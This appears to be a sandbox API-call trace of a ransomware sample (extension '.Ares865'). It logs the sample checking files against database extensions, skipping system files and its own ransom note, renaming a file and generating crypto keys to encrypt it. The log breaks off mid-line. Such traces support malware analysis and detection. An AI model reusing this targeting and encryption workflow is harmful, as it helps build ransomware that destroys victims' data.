[0089.804] lstrcmpiW (lpString1="H1H", lpString2="vhd") returned -1 [0089.804] lstrlenW (lpString="vhdx") returned 4 [0089.804] lstrcmpiW (lpString1=".H1H", lpString2="vhdx") returned -1 [0089.804] lstrlenW (lpString="avhd") returned 4 [0089.804] lstrcmpiW (lpString1=".H1H", lpString2="avhd") returned -1 [0089.804] lstrlenW (lpString="db") returned 2 [0089.804] lstrcmpiW (lpString1="1H", lpString2="db") returned -1 [0089.804] lstrlenW (lpString="db2") returned 3 [0089.804] lstrcmpiW (lpString1="H1H", lpString2="db2") returned 1 [0089.804] lstrlenW (lpString="db3") returned 3 [0089.804] lstrcmpiW (lpString1="H1H", lpString2="db3") returned 1 [0089.804] lstrlenW (lpString="dbf") returned 3 [0089.804] lstrcmpiW (lpString1="H1H", lpString2="dbf") returned 1 [0089.804] lstrlenW (lpString="mdf") returned 3 [0089.804] lstrcmpiW (lpString1="H1H", lpString2="mdf") returned -1 [0089.804] lstrlenW (lpString="mdb") returned 3 [0089.804] lstrcmpiW (lpString1="H1H", lpString2="mdb") returned -1 [0089.804] lstrlenW (lpString="sql") returned 3 [0089.804] lstrcmpiW (lpString1="H1H", lpString2="sql") returned -1 [0089.804] lstrlenW (lpString="sqlite") returned 6 [0089.804] lstrcmpiW (lpString1="lp.H1H", lpString2="sqlite") returned -1 [0089.804] lstrlenW (lpString="sqlite3") returned 7 [0089.804] lstrcmpiW (lpString1="elp.H1H", lpString2="sqlite3") returned -1 [0089.804] lstrlenW (lpString="sqlitedb") returned 8 [0089.804] lstrcmpiW (lpString1="help.H1H", lpString2="sqlitedb") returned -1 [0089.804] lstrlenW (lpString="xml") returned 3 [0089.804] lstrcmpiW (lpString1="H1H", lpString2="xml") returned -1 [0089.804] lstrlenW (lpString="$er") returned 3 [0089.804] lstrcmpiW (lpString1="H1H", lpString2="$er") returned 1 [0089.804] lstrlenW (lpString="4dd") returned 3 [0089.804] lstrcmpiW (lpString1="H1H", lpString2="4dd") returned 1 [0089.804] lstrlenW (lpString="4dl") returned 3 [0089.804] lstrcmpiW (lpString1="H1H", lpString2="4dl") returned 1 [0089.805] lstrlenW (lpString="^^^") returned 3 [0089.805] lstrcmpiW (lpString1="H1H", lpString2="^^^") returned 1 [0089.805] lstrlenW (lpString="abs") returned 3 [0089.805] lstrcmpiW (lpString1="H1H", lpString2="abs") returned 1 [0089.805] lstrlenW (lpString="abx") returned 3 [0089.805] lstrcmpiW (lpString1="H1H", lpString2="abx") returned 1 [0089.805] lstrlenW (lpString="accdb") returned 5 [0089.805] lstrcmpiW (lpString1="p.H1H", lpString2="accdb") returned 1 [0089.805] lstrlenW (lpString="accdc") returned 5 [0089.805] lstrcmpiW (lpString1="p.H1H", lpString2="accdc") returned 1 [0089.805] lstrlenW (lpString="accde") returned 5 [0089.805] lstrcmpiW (lpString1="p.H1H", lpString2="accde") returned 1 [0089.805] lstrlenW (lpString="accdr") returned 5 [0089.805] lstrcmpiW (lpString1="p.H1H", lpString2="accdr") returned 1 [0089.805] lstrlenW (lpString="accdt") returned 5 [0089.805] lstrcmpiW (lpString1="p.H1H", lpString2="accdt") returned 1 [0089.805] lstrlenW (lpString="accdw") returned 5 [0089.805] lstrcmpiW (lpString1="p.H1H", lpString2="accdw") returned 1 [0089.805] lstrlenW (lpString="accft") returned 5 [0089.805] lstrcmpiW (lpString1="p.H1H", lpString2="accft") returned 1 [0089.805] lstrlenW (lpString="adb") returned 3 [0089.805] lstrcmpiW (lpString1="H1H", lpString2="adb") returned 1 [0089.805] lstrlenW (lpString="adb") returned 3 [0089.805] lstrcmpiW (lpString1="H1H", lpString2="adb") returned 1 [0089.805] lstrlenW (lpString="ade") returned 3 [0089.805] lstrcmpiW (lpString1="H1H", lpString2="ade") returned 1 [0089.805] lstrlenW (lpString="adf") returned 3 [0089.805] lstrcmpiW (lpString1="H1H", lpString2="adf") returned 1 [0089.805] lstrlenW (lpString="adn") returned 3 [0089.805] lstrcmpiW (lpString1="H1H", lpString2="adn") returned 1 [0089.805] lstrlenW (lpString="adp") returned 3 [0089.805] lstrcmpiW (lpString1="H1H", lpString2="adp") returned 1 [0089.805] lstrlenW (lpString="alf") returned 3 [0089.805] lstrcmpiW (lpString1="H1H", lpString2="alf") returned 1 [0089.805] lstrlenW (lpString="ask") returned 3 [0089.805] lstrcmpiW (lpString1="H1H", lpString2="ask") returned 1 [0089.805] lstrlenW (lpString="btr") returned 3 [0089.805] lstrcmpiW (lpString1="H1H", lpString2="btr") returned 1 [0089.805] lstrlenW (lpString="cat") returned 3 [0089.805] lstrcmpiW (lpString1="H1H", lpString2="cat") returned 1 [0089.806] lstrlenW (lpString="cdb") returned 3 [0089.806] lstrcmpiW (lpString1="H1H", lpString2="cdb") returned 1 [0089.806] lstrlenW (lpString="ckp") returned 3 [0089.806] lstrcmpiW (lpString1="H1H", lpString2="ckp") returned 1 [0089.806] lstrlenW (lpString="cma") returned 3 [0089.806] lstrcmpiW (lpString1="H1H", lpString2="cma") returned 1 [0089.806] lstrlenW (lpString="cpd") returned 3 [0089.806] lstrcmpiW (lpString1="H1H", lpString2="cpd") returned 1 [0089.806] lstrlenW (lpString="dacpac") returned 6 [0089.806] lstrcmpiW (lpString1="lp.H1H", lpString2="dacpac") returned 1 [0089.806] lstrlenW (lpString="dad") returned 3 [0089.806] lstrcmpiW (lpString1="H1H", lpString2="dad") returned 1 [0089.806] lstrlenW (lpString="dadiagrams") returned 10 [0089.806] lstrcmpiW (lpString1="C_help.H1H", lpString2="dadiagrams") returned -1 [0089.806] lstrlenW (lpString="daschema") returned 8 [0089.806] lstrcmpiW (lpString1="help.H1H", lpString2="daschema") returned 1 [0089.806] lstrlenW (lpString="db-journal") returned 10 [0089.806] lstrcmpiW (lpString1="C_help.H1H", lpString2="db-journal") returned -1 [0089.806] lstrlenW (lpString="db-shm") returned 6 [0089.806] lstrcmpiW (lpString1="lp.H1H", lpString2="db-shm") returned 1 [0089.806] lstrlenW (lpString="db-wal") returned 6 [0089.806] lstrcmpiW (lpString1="lp.H1H", lpString2="db-wal") returned 1 [0089.806] lstrlenW (lpString="dbc") returned 3 [0089.806] lstrcmpiW (lpString1="H1H", lpString2="dbc") returned 1 [0089.806] lstrlenW (lpString="dbs") returned 3 [0089.806] lstrcmpiW (lpString1="H1H", lpString2="dbs") returned 1 [0089.806] lstrlenW (lpString="dbt") returned 3 [0089.806] lstrcmpiW (lpString1="H1H", lpString2="dbt") returned 1 [0089.806] lstrlenW (lpString="dbv") returned 3 [0089.806] lstrcmpiW (lpString1="H1H", lpString2="dbv") returned 1 [0089.806] lstrlenW (lpString="dbx") returned 3 [0089.806] lstrcmpiW (lpString1="H1H", lpString2="dbx") returned 1 [0089.806] lstrlenW (lpString="dcb") returned 3 [0089.806] lstrcmpiW (lpString1="H1H", lpString2="dcb") returned 1 [0089.806] lstrlenW (lpString="dct") returned 3 [0089.806] lstrcmpiW (lpString1="H1H", lpString2="dct") returned 1 [0089.806] lstrlenW (lpString="dcx") returned 3 [0089.806] lstrcmpiW (lpString1="H1H", lpString2="dcx") returned 1 [0089.806] lstrlenW (lpString="ddl") returned 3 [0089.806] lstrcmpiW (lpString1="H1H", lpString2="ddl") returned 1 [0089.807] lstrlenW (lpString="dlis") returned 4 [0089.807] lstrcmpiW (lpString1=".H1H", lpString2="dlis") returned -1 [0089.807] lstrlenW (lpString="dp1") returned 3 [0089.807] lstrcmpiW (lpString1="H1H", lpString2="dp1") returned 1 [0089.807] lstrlenW (lpString="dqy") returned 3 [0089.807] lstrcmpiW (lpString1="H1H", lpString2="dqy") returned 1 [0089.807] lstrlenW (lpString="dsk") returned 3 [0089.807] lstrcmpiW (lpString1="H1H", lpString2="dsk") returned 1 [0089.807] lstrlenW (lpString="dsn") returned 3 [0089.807] lstrcmpiW (lpString1="H1H", lpString2="dsn") returned 1 [0089.807] lstrlenW (lpString="dtsx") returned 4 [0089.807] lstrcmpiW (lpString1=".H1H", lpString2="dtsx") returned -1 [0089.807] lstrlenW (lpString="dxl") returned 3 [0089.807] lstrcmpiW (lpString1="H1H", lpString2="dxl") returned 1 [0089.807] lstrlenW (lpString="eco") returned 3 [0089.807] lstrcmpiW (lpString1="H1H", lpString2="eco") returned 1 [0089.807] lstrlenW (lpString="ecx") returned 3 [0089.807] lstrcmpiW (lpString1="H1H", lpString2="ecx") returned 1 [0089.807] lstrlenW (lpString="edb") returned 3 [0089.807] lstrcmpiW (lpString1="H1H", lpString2="edb") returned 1 [0089.807] lstrlenW (lpString="epim") returned 4 [0089.807] lstrcmpiW (lpString1=".H1H", lpString2="epim") returned -1 [0089.807] lstrlenW (lpString="fcd") returned 3 [0089.807] lstrcmpiW (lpString1="H1H", lpString2="fcd") returned 1 [0089.807] lstrlenW (lpString="fdb") returned 3 [0089.807] lstrcmpiW (lpString1="H1H", lpString2="fdb") returned 1 [0089.807] lstrlenW (lpString="fic") returned 3 [0089.807] lstrcmpiW (lpString1="H1H", lpString2="fic") returned 1 [0089.807] lstrlenW (lpString="flexolibrary") returned 12 [0089.807] lstrcmpiW (lpString1="TOC_help.H1H", lpString2="flexolibrary") returned 1 [0089.807] lstrlenW (lpString="fm5") returned 3 [0089.807] lstrcmpiW (lpString1="H1H", lpString2="fm5") returned 1 [0089.807] lstrlenW (lpString="fmp") returned 3 [0089.807] lstrcmpiW (lpString1="H1H", lpString2="fmp") returned 1 [0089.807] lstrlenW (lpString="fmp12") returned 5 [0089.807] lstrcmpiW (lpString1="p.H1H", lpString2="fmp12") returned 1 [0089.807] lstrlenW (lpString="fmpsl") returned 5 [0089.807] lstrcmpiW (lpString1="p.H1H", lpString2="fmpsl") returned 1 [0089.807] lstrlenW (lpString="fol") returned 3 [0089.807] lstrcmpiW (lpString1="H1H", lpString2="fol") returned 1 [0089.808] lstrlenW (lpString="fp3") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="fp3") returned 1 [0089.808] lstrlenW (lpString="fp4") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="fp4") returned 1 [0089.808] lstrlenW (lpString="fp5") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="fp5") returned 1 [0089.808] lstrlenW (lpString="fp7") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="fp7") returned 1 [0089.808] lstrlenW (lpString="fpt") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="fpt") returned 1 [0089.808] lstrlenW (lpString="frm") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="frm") returned 1 [0089.808] lstrlenW (lpString="gdb") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="gdb") returned 1 [0089.808] lstrlenW (lpString="gdb") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="gdb") returned 1 [0089.808] lstrlenW (lpString="grdb") returned 4 [0089.808] lstrcmpiW (lpString1=".H1H", lpString2="grdb") returned -1 [0089.808] lstrlenW (lpString="gwi") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="gwi") returned 1 [0089.808] lstrlenW (lpString="hdb") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="hdb") returned -1 [0089.808] lstrlenW (lpString="his") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="his") returned -1 [0089.808] lstrlenW (lpString="ib") returned 2 [0089.808] lstrcmpiW (lpString1="1H", lpString2="ib") returned -1 [0089.808] lstrlenW (lpString="idb") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="idb") returned -1 [0089.808] lstrlenW (lpString="ihx") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="ihx") returned -1 [0089.808] lstrlenW (lpString="itdb") returned 4 [0089.808] lstrcmpiW (lpString1=".H1H", lpString2="itdb") returned -1 [0089.808] lstrlenW (lpString="itw") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="itw") returned -1 [0089.808] lstrlenW (lpString="jet") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="jet") returned -1 [0089.808] lstrlenW (lpString="jtx") returned 3 [0089.808] lstrcmpiW (lpString1="H1H", lpString2="jtx") returned -1 [0089.808] lstrlenW (lpString="kdb") returned 3 [0089.809] lstrcmpiW (lpString1="H1H", lpString2="kdb") returned -1 [0089.809] lstrlenW (lpString="kexi") returned 4 [0089.809] lstrcmpiW (lpString1=".H1H", lpString2="kexi") returned -1 [0089.809] lstrlenW (lpString="kexic") returned 5 [0089.809] lstrcmpiW (lpString1="p.H1H", lpString2="kexic") returned 1 [0089.809] lstrlenW (lpString="kexis") returned 5 [0089.809] lstrcmpiW (lpString1="p.H1H", lpString2="kexis") returned 1 [0089.809] lstrlenW (lpString="lgc") returned 3 [0089.809] lstrcmpiW (lpString1="H1H", lpString2="lgc") returned -1 [0089.809] lstrlenW (lpString="lwx") returned 3 [0089.809] lstrcmpiW (lpString1="H1H", lpString2="lwx") returned -1 [0089.809] lstrlenW (lpString="maf") returned 3 [0089.809] lstrcmpiW (lpString1="H1H", lpString2="maf") returned -1 [0089.809] lstrlenW (lpString="maq") returned 3 [0089.809] lstrcmpiW (lpString1="H1H", lpString2="maq") returned -1 [0089.809] lstrlenW (lpString="mar") returned 3 [0089.809] lstrcmpiW (lpString1="H1H", lpString2="mar") returned -1 [0089.809] lstrlenW (lpString="marshal") returned 7 [0089.809] lstrcmpiW (lpString1="elp.H1H", lpString2="marshal") returned -1 [0089.809] lstrlenW (lpString="mas") returned 3 [0089.809] lstrcmpiW (lpString1="H1H", lpString2="mas") returned -1 [0089.809] lstrlenW (lpString="mav") returned 3 [0089.809] lstrcmpiW (lpString1="H1H", lpString2="mav") returned -1 [0089.809] lstrlenW (lpString="maw") returned 3 [0089.809] lstrcmpiW (lpString1="H1H", lpString2="maw") returned -1 [0089.809] lstrlenW (lpString="mdbhtml") returned 7 [0089.809] lstrcmpiW (lpString1="elp.H1H", lpString2="mdbhtml") returned -1 [0089.809] lstrlenW (lpString="mdn") returned 3 [0089.809] lstrcmpiW (lpString1="H1H", lpString2="mdn") returned -1 [0089.809] lstrlenW (lpString="mdt") returned 3 [0089.809] lstrcmpiW (lpString1="H1H", lpString2="mdt") returned -1 [0089.809] lstrlenW (lpString="mfd") returned 3 [0089.809] lstrcmpiW (lpString1="H1H", lpString2="mfd") returned -1 [0089.809] lstrlenW (lpString="mpd") returned 3 [0089.809] lstrcmpiW (lpString1="H1H", lpString2="mpd") returned -1 [0089.809] lstrlenW (lpString="mrg") returned 3 [0089.809] lstrcmpiW (lpString1="H1H", lpString2="mrg") returned -1 [0089.809] lstrlenW (lpString="mud") returned 3 [0089.809] lstrcmpiW (lpString1="H1H", lpString2="mud") returned -1 [0089.810] lstrlenW (lpString="mwb") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="mwb") returned -1 [0089.810] lstrlenW (lpString="myd") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="myd") returned -1 [0089.810] lstrlenW (lpString="ndf") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="ndf") returned -1 [0089.810] lstrlenW (lpString="nnt") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="nnt") returned -1 [0089.810] lstrlenW (lpString="nrmlib") returned 6 [0089.810] lstrcmpiW (lpString1="lp.H1H", lpString2="nrmlib") returned -1 [0089.810] lstrlenW (lpString="ns2") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="ns2") returned -1 [0089.810] lstrlenW (lpString="ns3") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="ns3") returned -1 [0089.810] lstrlenW (lpString="ns4") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="ns4") returned -1 [0089.810] lstrlenW (lpString="nsf") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="nsf") returned -1 [0089.810] lstrlenW (lpString="nv") returned 2 [0089.810] lstrcmpiW (lpString1="1H", lpString2="nv") returned -1 [0089.810] lstrlenW (lpString="nv2") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="nv2") returned -1 [0089.810] lstrlenW (lpString="nwdb") returned 4 [0089.810] lstrcmpiW (lpString1=".H1H", lpString2="nwdb") returned -1 [0089.810] lstrlenW (lpString="nyf") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="nyf") returned -1 [0089.810] lstrlenW (lpString="odb") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="odb") returned -1 [0089.810] lstrlenW (lpString="odb") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="odb") returned -1 [0089.810] lstrlenW (lpString="oqy") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="oqy") returned -1 [0089.810] lstrlenW (lpString="ora") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="ora") returned -1 [0089.810] lstrlenW (lpString="orx") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="orx") returned -1 [0089.810] lstrlenW (lpString="owc") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="owc") returned -1 [0089.810] lstrlenW (lpString="p96") returned 3 [0089.810] lstrcmpiW (lpString1="H1H", lpString2="p96") returned -1 [0089.811] lstrlenW (lpString="p97") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="p97") returned -1 [0089.811] lstrlenW (lpString="pan") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="pan") returned -1 [0089.811] lstrlenW (lpString="pdb") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="pdb") returned -1 [0089.811] lstrlenW (lpString="pdm") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="pdm") returned -1 [0089.811] lstrlenW (lpString="pnz") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="pnz") returned -1 [0089.811] lstrlenW (lpString="qry") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="qry") returned -1 [0089.811] lstrlenW (lpString="qvd") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="qvd") returned -1 [0089.811] lstrlenW (lpString="rbf") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="rbf") returned -1 [0089.811] lstrlenW (lpString="rctd") returned 4 [0089.811] lstrcmpiW (lpString1=".H1H", lpString2="rctd") returned -1 [0089.811] lstrlenW (lpString="rod") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="rod") returned -1 [0089.811] lstrlenW (lpString="rodx") returned 4 [0089.811] lstrcmpiW (lpString1=".H1H", lpString2="rodx") returned -1 [0089.811] lstrlenW (lpString="rpd") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="rpd") returned -1 [0089.811] lstrlenW (lpString="rsd") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="rsd") returned -1 [0089.811] lstrlenW (lpString="sas7bdat") returned 8 [0089.811] lstrcmpiW (lpString1="help.H1H", lpString2="sas7bdat") returned -1 [0089.811] lstrlenW (lpString="sbf") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="sbf") returned -1 [0089.811] lstrlenW (lpString="scx") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="scx") returned -1 [0089.811] lstrlenW (lpString="sdb") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="sdb") returned -1 [0089.811] lstrlenW (lpString="sdc") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="sdc") returned -1 [0089.811] lstrlenW (lpString="sdf") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="sdf") returned -1 [0089.811] lstrlenW (lpString="sis") returned 3 [0089.811] lstrcmpiW (lpString1="H1H", lpString2="sis") returned -1 [0089.811] lstrlenW (lpString="spq") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="spq") returned -1 [0089.812] lstrlenW (lpString="te") returned 2 [0089.812] lstrcmpiW (lpString1="1H", lpString2="te") returned -1 [0089.812] lstrlenW (lpString="teacher") returned 7 [0089.812] lstrcmpiW (lpString1="elp.H1H", lpString2="teacher") returned -1 [0089.812] lstrlenW (lpString="tmd") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="tmd") returned -1 [0089.812] lstrlenW (lpString="tps") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="tps") returned -1 [0089.812] lstrlenW (lpString="trc") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="trc") returned -1 [0089.812] lstrlenW (lpString="trc") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="trc") returned -1 [0089.812] lstrlenW (lpString="trm") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="trm") returned -1 [0089.812] lstrlenW (lpString="udb") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="udb") returned -1 [0089.812] lstrlenW (lpString="udl") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="udl") returned -1 [0089.812] lstrlenW (lpString="usr") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="usr") returned -1 [0089.812] lstrlenW (lpString="v12") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="v12") returned -1 [0089.812] lstrlenW (lpString="vis") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="vis") returned -1 [0089.812] lstrlenW (lpString="vpd") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="vpd") returned -1 [0089.812] lstrlenW (lpString="vvv") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="vvv") returned -1 [0089.812] lstrlenW (lpString="wdb") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="wdb") returned -1 [0089.812] lstrlenW (lpString="wmdb") returned 4 [0089.812] lstrcmpiW (lpString1=".H1H", lpString2="wmdb") returned -1 [0089.812] lstrlenW (lpString="wrk") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="wrk") returned -1 [0089.812] lstrlenW (lpString="xdb") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="xdb") returned -1 [0089.812] lstrlenW (lpString="xld") returned 3 [0089.812] lstrcmpiW (lpString1="H1H", lpString2="xld") returned -1 [0089.812] lstrlenW (lpString="xmlff") returned 5 [0089.813] lstrcmpiW (lpString1="p.H1H", lpString2="xmlff") returned -1 [0089.813] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.Ares865") returned 83 [0089.813] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.Ares865" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h.ares865"), dwFlags=0x1) returned 1 [0089.813] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.Ares865" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.814] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=499482) returned 1 [0089.814] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.814] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.814] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.814] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.815] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.815] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.815] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a220, lpName=0x0) returned 0x15c [0089.817] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a220) returned 0x420000 [0089.841] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.842] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.842] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.842] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.842] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.842] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.842] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.842] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.842] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0089.847] CloseHandle (hObject=0x15c) returned 1 [0089.847] CloseHandle (hObject=0x118) returned 1 [0089.847] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.847] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.847] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.849] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x26353250, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae45604d, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae45604d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x3944, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Help_MValidator.H1D", cAlternateFileName="HELP_M~1.H1D")) returned 1 [0089.849] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.849] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="aoldtz.exe") returned 1 [0089.849] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2=".") returned 1 [0089.849] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="..") returned 1 [0089.849] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="windows") returned -1 [0089.849] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="bootmgr") returned 1 [0089.849] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="temp") returned -1 [0089.849] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="pagefile.sys") returned -1 [0089.849] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="boot") returned 1 [0089.849] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="ids.txt") returned -1 [0089.849] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="ntuser.dat") returned -1 [0089.849] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="perflogs") returned -1 [0089.849] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="MSBuild") returned -1 [0089.849] lstrlenW (lpString="Help_MValidator.H1D") returned 19 [0089.850] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned 75 [0089.850] lstrcpyW (in: lpString1=0x2cce472, lpString2="Help_MValidator.H1D" | out: lpString1="Help_MValidator.H1D") returned="Help_MValidator.H1D" [0089.850] lstrlenW (lpString="Help_MValidator.H1D") returned 19 [0089.850] lstrlenW (lpString="Ares865") returned 7 [0089.850] lstrcmpiW (lpString1="tor.H1D", lpString2="Ares865") returned 1 [0089.850] lstrlenW (lpString=".dll") returned 